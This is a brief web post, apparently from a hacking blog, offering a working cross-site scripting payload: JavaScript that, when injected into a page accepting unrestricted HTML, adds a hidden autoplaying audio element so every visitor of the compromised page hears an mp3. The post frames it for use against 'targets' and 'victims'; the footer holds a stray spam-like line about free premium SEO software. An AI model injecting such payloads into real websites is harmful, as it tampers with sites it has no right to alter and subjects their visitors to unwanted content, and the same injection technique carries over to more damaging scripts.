Play Music HTML5 Audio XSS Payload

Spread the love

Play Music HTML5 Audio XSS Payload

Script below allows you to share your favorite mp3 through your targets browser.

Lets assume the XSS payload was injected in to a web page that supports unrestricted HTML an mp3 audio file would then play to the visitors of the compromised web page.

if(document.getElementById('xss_audio') == null ) {
var a = document.createElement('audio');
a.src = "http://127.0.0.1/music/LesRatsQuittentLeNavire.mp3"
a.autoplay=true;
a.id='xss_audio';
a.style.display='none';
document.body.appendChild(a);
}

A simple script that uses html5 audio tag to share your favorite MP3 with the victim.

Author : Renaud Bidou
 Injecting XSS Payloads into an image

If you have found a spelling error, please, notify us by selecting that text and pressing Ctrl+Enter.

yoast seo premium free

Spelling error report

The following text will be sent to our editors: